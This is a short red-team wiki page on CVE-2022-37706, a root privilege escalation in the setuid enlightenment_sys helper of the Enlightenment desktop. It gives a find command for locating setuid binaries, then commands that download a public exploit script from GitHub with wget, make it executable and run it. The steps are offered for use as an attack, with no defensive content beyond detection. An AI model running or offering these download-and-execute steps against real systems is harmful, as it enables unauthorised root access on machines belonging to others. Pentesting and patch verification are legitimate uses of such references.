Overview

Enlightenment is a Window Manager, Compositor, and Minimal Desktop for Linux (the primary platform), BSD, and any other compatible UNIX system. Enlightenment is classed as a “desktop shell” as it provides everything you need to operate your desktop or laptop, but it is not a full application suite. This covers functionality including launching applications, managing their windows, and performing system tasks like suspending, rebooting, managing files, and so on. enlightenment_sys in Enlightenment before 0.25.4 allows local users to gain privileges because it is setuid root, and the system library function mishandles pathnames that begin with a /dev/.. substring.

Exploitation

Detect

Check if enlightenment is SUID root (or other) :

find / -perm -u=s -type f 2>/dev/null | xargs ls -l

Exploit

https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit

wget https://raw.githubusercontent.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/refs/heads/main/exploit.sh
chmod +x exploit.sh
./exploit.sh

❯ RedSquad

Explorer

CVE-2022-37706 - Enlightenment LPE

Overview

Exploitation

Detect

Exploit

Table of Contents